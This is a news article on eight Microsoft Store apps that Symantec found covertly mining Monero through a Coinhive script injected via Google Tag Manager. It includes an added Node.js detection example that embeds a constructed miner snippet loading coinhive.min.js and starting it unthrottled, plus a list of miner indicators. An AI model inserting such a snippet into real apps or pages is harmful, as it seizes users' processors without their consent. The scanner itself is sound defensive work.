Microsoft has removed from the official Microsoft Store eight Windows 10 apps that had been caught mining the Monero cryptocurrency behind users' backs for the benefit of the apps' developers.
The names of the eight apps are Fast-search Lite, Battery Optimizer (Tutorials), VPN Browsers+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019, and Findoo Mobile & Desktop Search.
The apps were published under three developer names, namely DigiDream, 1clean, and Findoo. US cyber-security firm Symantec, which discovered the malicious apps last month, says that evidence it found in the applications' source code and in the domains associated with them led it to believe all eight had been built by the same person or group, despite the different publisher names.
According to a Symantec technical report shared with ZDNet, all eight apps worked in the same way. Each embedded the Google Tag Manager (GTM) library in its source code. GTM is a legitimate tag-management service that lets a remotely hosted container inject further scripts into a page at runtime, and it was through this channel that the apps later downloaded and executed the actual malicious payload, so the miner itself never had to ship inside the package submitted to the Store.
"A malicious URL with mining script was detected, and we backtracked to find these applications," Tommy Dong, Senior Principal Software Engineer at Symantec, told ZDNet. "Symantec AV can convict generic JS-based cryptocurrency mining disregarding any domain."
Users who installed these apps over the past few months would have seen their CPU usage go through the roof, as the Coinhive miner would consume all available resources to mine Monero for the app devs.
"There is no throttling which means it uses up 100% of user's CPU time. Opening the app will cause a detectable spike in CPU usage," Dong told us.
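What a domain-agnostic check for this kind of payload can look like, as an added example that is not part of the original article and is neither Symantec's detection logic nor code from the apps: a small Node.js scanner that classifies a script body by the markers a Coinhive-style miner leaves behind (the library URL and constructor names, the CryptoNight algorithm name, a Web Worker, a `.start()` call) rather than by the hostname it was fetched from, and that reads out the `throttle` option so an unthrottled miner, the 100%-CPU case Dong describes, is reported separately. The indicator list is this example's own choice, and the three sample scripts, including the site key and GTM container id, are constructed placeholders.

```javascript
// Added example (not Symantec's detection logic, not code from the apps):
// a static indicator scanner for Coinhive-style in-page miners of the kind a
// WebView-based Store app could pull in at runtime through a Google Tag
// Manager container. Sample scripts below are constructed for this example.

const MINER_INDICATORS = [
  // Coinhive's public library URL and its constructor names. "strong" marks
  // indicators that are sufficient on their own to flag a script.
  { name: 'coinhive-library', re: /coinhive(?:\.min)?\.js|CoinHive\.(?:Anonymous|User)\s*\(/i, strong: true },
  // CryptoNight was the Monero proof-of-work hash in-browser miners ran.
  { name: 'cryptonight', re: /cryptonight/i, strong: true },
  // Weak indicators: common in benign code, only meaningful alongside a strong one.
  { name: 'web-worker', re: /new\s+Worker\s*\(/, strong: false },
  { name: 'miner-start', re: /\.start\s*\(/, strong: false },
];

// Returns the configured throttle (fraction of time the miner idles; 0 means
// run flat out) or null when the script sets none.
function extractThrottle(script) {
  const m = script.match(/throttle\s*:\s*([0-9]*\.?[0-9]+)/);
  return m ? parseFloat(m[1]) : null;
}

// Classifies one script body. A script is flagged as a miner only when at
// least one strong indicator is present, so a plain Web Worker or a .start()
// call in ordinary application code does not trigger a verdict by itself.
function scanScript(script) {
  const hits = MINER_INDICATORS.filter(i => i.re.test(script));
  const isMiner = hits.some(i => i.strong);
  const throttle = extractThrottle(script);
  return {
    isMiner,
    indicators: hits.map(i => i.name),
    throttle,
    // No throttle option, or throttle 0, means the miner takes all available CPU time.
    unthrottled: isMiner && (throttle === null || throttle === 0),
  };
}

// Constructed sample: what a GTM "Custom HTML" tag that injects an
// unthrottled miner could look like. Site key is a placeholder.
const MINER_SAMPLE = `
  var s = document.createElement('script');
  s.src = 'https://coinhive.com/lib/coinhive.min.js';
  s.onload = function () {
    var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', { throttle: 0 });
    miner.start();
  };
  document.head.appendChild(s);
`;

// Constructed sample: the same miner, but configured to idle half the time.
const THROTTLED_SAMPLE = `
  var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', { throttle: 0.5 });
  miner.start();
`;

// Constructed sample: an ordinary GTM bootstrap snippet with no miner.
// Container id is a placeholder.
const BENIGN_SAMPLE = `
  (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
  var f=d.getElementsByTagName(s)[0],j=d.createElement(s);j.async=true;
  j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
  })(window,document,'script','dataLayer','GTM-XXXXXXX');
`;

// Scan a map of name -> script body and return a map of name -> verdict.
function scanAll(scripts) {
  const out = {};
  for (const [name, body] of Object.entries(scripts)) out[name] = scanScript(body);
  return out;
}

console.log(scanAll({ miner: MINER_SAMPLE, throttled: THROTTLED_SAMPLE, benign: BENIGN_SAMPLE }));
```

Keying on the library and algorithm markers rather than on a URL is what keeps the check useful when the payload moves to a new domain, which is exactly what a remotely managed GTM container allows an operator to do without touching the Store package. The throttle readout is worth keeping in the verdict: a miner with `throttle: 0` or no throttle at all is the one that produces the CPU spike described above, and it is also the one most likely to be noticed by users.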
Because the Microsoft Store does not publish install counts, it is impossible to say how many users were affected. Symantec pointed out that the apps had thousands of reviews, which suggests they were somewhat popular, although review counts are not a reliable gauge either, as there are online services that sell fake reviews on the Microsoft Store.
The apps are what security researchers would normally call cryptojacking apps or cryptominers. Cryptojacking is the term for mining cryptocurrency on a user's device without the user's knowledge or consent, with the proceeds going to whoever planted the miner.
Following the sudden rise in cryptocurrency prices in mid-2017, cryptojacking, first done inside browsers and later with dedicated software on servers, has become one of today's most prevalent forms of cybercrime, with some groups making millions of US dollars in profit.